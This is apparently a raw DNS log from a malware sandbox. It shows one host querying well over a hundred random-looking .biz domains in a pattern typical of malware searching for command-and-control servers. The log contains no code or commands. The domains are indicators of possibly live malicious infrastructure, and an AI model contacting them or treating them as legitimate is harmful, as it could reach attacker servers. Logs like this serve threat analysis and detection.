                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.056502104 CEST192.168.2.41.1.1.10xd1ceStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.066010952 CEST192.168.2.41.1.1.10xcc52Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.304588079 CEST192.168.2.41.1.1.10xbccStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.312314987 CEST192.168.2.41.1.1.10xe3ecStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.321635008 CEST192.168.2.41.1.1.10x3cecStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.487287045 CEST192.168.2.41.1.1.10x33f4Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.438119888 CEST192.168.2.41.1.1.10xd0f1Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.435421944 CEST192.168.2.41.1.1.10x1b9Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.134319067 CEST192.168.2.41.1.1.10xd160Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.608376980 CEST192.168.2.41.1.1.10x4dc6Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.956599951 CEST192.168.2.41.1.1.10xdb37Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.357985020 CEST192.168.2.41.1.1.10x7a09Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.554475069 CEST192.168.2.41.1.1.10x35e0Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.392577887 CEST192.168.2.41.1.1.10x4270Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.765997887 CEST192.168.2.41.1.1.10xd5e3Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.577131033 CEST192.168.2.41.1.1.10x1e9fStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.642941952 CEST192.168.2.41.1.1.10x42c2Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.410362005 CEST192.168.2.41.1.1.10x1257Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.969723940 CEST192.168.2.41.1.1.10x1d17Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.284267902 CEST192.168.2.41.1.1.10x99aeStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.902477026 CEST192.168.2.41.1.1.10xb223Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.029062033 CEST192.168.2.41.1.1.10xa254Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.319195032 CEST192.168.2.41.1.1.10x7e77Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.887706995 CEST192.168.2.41.1.1.10xa1c0Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.192673922 CEST192.168.2.41.1.1.10x61e3Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.917565107 CEST192.168.2.41.1.1.10x78d3Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.024544001 CEST192.168.2.41.1.1.10xc494Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.699821949 CEST192.168.2.41.1.1.10xb6f0Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.966543913 CEST192.168.2.41.1.1.10x6fe8Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.317666054 CEST192.168.2.41.1.1.10x755bStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.475619078 CEST192.168.2.41.1.1.10xdc0fStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.791481972 CEST192.168.2.41.1.1.10x4b3cStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.476006985 CEST192.168.2.41.1.1.10x23c8Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.812159061 CEST192.168.2.41.1.1.10x140Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.377132893 CEST192.168.2.41.1.1.10x72a9Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.189074993 CEST192.168.2.41.1.1.10xb467Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.218003035 CEST192.168.2.41.1.1.10xaeebStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.040446997 CEST192.168.2.41.1.1.10x54bfStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.087846994 CEST192.168.2.41.1.1.10x323fStandard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.822004080 CEST192.168.2.41.1.1.10x1ee7Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.803138018 CEST192.168.2.41.1.1.10x7bc3Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.144165993 CEST192.168.2.41.1.1.10xb990Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.347379923 CEST192.168.2.41.1.1.10x92f0Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.900764942 CEST192.168.2.41.1.1.10x7154Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.000443935 CEST192.168.2.41.1.1.10x179aStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.875027895 CEST192.168.2.41.1.1.10x3464Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.355310917 CEST192.168.2.41.1.1.10xc463Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.363804102 CEST192.168.2.41.1.1.10xce8Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.848520041 CEST192.168.2.41.1.1.10x7146Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.964797974 CEST192.168.2.41.1.1.10x3951Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.611051083 CEST192.168.2.41.1.1.10x4c3aStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.123080015 CEST192.168.2.41.1.1.10xef01Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.462775946 CEST192.168.2.41.1.1.10x8810Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.922153950 CEST192.168.2.41.1.1.10x4126Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.900885105 CEST192.168.2.41.1.1.10x5a11Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.243163109 CEST192.168.2.41.1.1.10x24bcStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.819854975 CEST192.168.2.41.1.1.10x2a38Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.135782003 CEST192.168.2.41.1.1.10xd9dfStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.535593987 CEST192.168.2.41.1.1.10x6ef2Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.547425032 CEST192.168.2.41.1.1.10xd718Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.622749090 CEST192.168.2.41.1.1.10x298Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.392416000 CEST192.168.2.41.1.1.10x2fe4Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.090029001 CEST192.168.2.41.1.1.10xb164Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.151376963 CEST192.168.2.41.1.1.10x4b25Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.140163898 CEST192.168.2.41.1.1.10xb88fStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.790467024 CEST192.168.2.41.1.1.10xcee4Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.862623930 CEST192.168.2.41.1.1.10xc0ffStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.492038012 CEST192.168.2.41.1.1.10x71b2Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.481775045 CEST192.168.2.41.1.1.10x4ddStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.511537075 CEST192.168.2.41.1.1.10x8740Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.287781000 CEST192.168.2.41.1.1.10xb294Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.597270012 CEST192.168.2.41.1.1.10x37e3Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.802829981 CEST192.168.2.41.1.1.10x82eeStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.097446918 CEST192.168.2.41.1.1.10x141dStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.759212017 CEST192.168.2.41.1.1.10xa8ceStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.058988094 CEST192.168.2.41.1.1.10xe340Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.692397118 CEST192.168.2.41.1.1.10xe2b7Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.177506924 CEST192.168.2.41.1.1.10x1279Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.228328943 CEST192.168.2.41.1.1.10xcd76Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.239413977 CEST192.168.2.41.1.1.10xfbe9Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.911716938 CEST192.168.2.41.1.1.10x447fStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.611911058 CEST192.168.2.41.1.1.10x49Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.766700029 CEST192.168.2.41.1.1.10x8cb2Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.470787048 CEST192.168.2.41.1.1.10x6e2fStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.982357025 CEST192.168.2.41.1.1.10xc663Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.830379009 CEST192.168.2.41.1.1.10x8b30Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.889893055 CEST192.168.2.41.1.1.10x6a64Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.233333111 CEST192.168.2.41.1.1.10xde3bStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.415793896 CEST192.168.2.41.1.1.10xbec3Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.714534044 CEST192.168.2.41.1.1.10x625aStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.240989923 CEST192.168.2.41.1.1.10xb359Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.518723011 CEST192.168.2.41.1.1.10x90efStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.742652893 CEST192.168.2.41.1.1.10xf1f0Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.695209980 CEST192.168.2.41.1.1.10x1ea1Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.214281082 CEST192.168.2.41.1.1.10xd616Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.146472931 CEST192.168.2.41.1.1.10xd4e3Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.834548950 CEST192.168.2.41.1.1.10x80b1Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.846812963 CEST192.168.2.41.1.1.10xaefStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.511866093 CEST192.168.2.41.1.1.10x1080Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.003350973 CEST192.168.2.41.1.1.10x51faStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.049097061 CEST192.168.2.41.1.1.10x3fStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.302362919 CEST192.168.2.41.1.1.10x5fcdStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.373214006 CEST192.168.2.41.1.1.10xf152Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.867098093 CEST192.168.2.41.1.1.10x8f0eStandard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.637340069 CEST192.168.2.41.1.1.10x6358Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.949809074 CEST192.168.2.41.1.1.10xe03aStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.018102884 CEST192.168.2.41.1.1.10xc383Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.836361885 CEST192.168.2.41.1.1.10x14cfStandard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.960124969 CEST192.168.2.41.1.1.10x67f8Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.318151951 CEST192.168.2.41.1.1.10x47e1Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.642137051 CEST192.168.2.41.1.1.10x2f7eStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.093384027 CEST192.168.2.41.1.1.10x7e49Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.350261927 CEST192.168.2.41.1.1.10xbb70Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.590718031 CEST192.168.2.41.1.1.10x65b1Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.491027117 CEST192.168.2.41.1.1.10xd2bbStandard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.502043009 CEST192.168.2.41.1.1.10xf671Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.258397102 CEST192.168.2.41.1.1.10x3be8Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.557528019 CEST192.168.2.41.1.1.10x74d7Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.021591902 CEST192.168.2.41.1.1.10x7c88Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.519099951 CEST192.168.2.41.1.1.10x106dStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.730140924 CEST192.168.2.41.1.1.10xe62cStandard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.053611040 CEST192.168.2.41.1.1.10xd183Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.588937998 CEST192.168.2.41.1.1.10x390cStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.603444099 CEST192.168.2.41.1.1.10x8eecStandard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.405755043 CEST192.168.2.41.1.1.10x1fd8Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.734704018 CEST192.168.2.41.1.1.10xdac8Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.275115967 CEST192.168.2.41.1.1.10x2a98Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.449971914 CEST192.168.2.41.1.1.10xacf6Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.876812935 CEST192.168.2.41.1.1.10x323Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.253360987 CEST192.168.2.41.1.1.10x267fStandard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.367043018 CEST192.168.2.41.1.1.10x2bafStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.394768000 CEST192.168.2.41.1.1.10x84c1Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.643351078 CEST192.168.2.41.1.1.10xd989Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.370292902 CEST192.168.2.41.1.1.10x682Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.062542915 CEST192.168.2.41.1.1.10x1fc6Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.305742979 CEST192.168.2.41.1.1.10xe89bStandard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.834331989 CEST192.168.2.41.1.1.10xefffStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.213774920 CEST192.168.2.41.1.1.10xabadStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.371920109 CEST192.168.2.41.1.1.10x699cStandard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.469265938 CEST192.168.2.41.1.1.10x51cStandard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.588587046 CEST192.168.2.41.1.1.10x3112Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.478199959 CEST192.168.2.41.1.1.10x34a1Standard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.127726078 CEST192.168.2.41.1.1.10xa3acStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.145297050 CEST192.168.2.41.1.1.10xa3acStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.008994102 CEST192.168.2.41.1.1.10xb89Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.247271061 CEST192.168.2.41.1.1.10x314dStandard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.270977974 CEST192.168.2.41.1.1.10x314dStandard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.038657904 CEST192.168.2.41.1.1.10xdbb3Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.068919897 CEST192.168.2.41.1.1.10xdbb3Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.388348103 CEST192.168.2.41.1.1.10xf138Standard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.894006968 CEST192.168.2.41.1.1.10x8b9fStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.480323076 CEST192.168.2.41.1.1.10xfae6Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.202472925 CEST192.168.2.41.1.1.10xaa7dStandard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.045087099 CEST192.168.2.41.1.1.10xfa6eStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
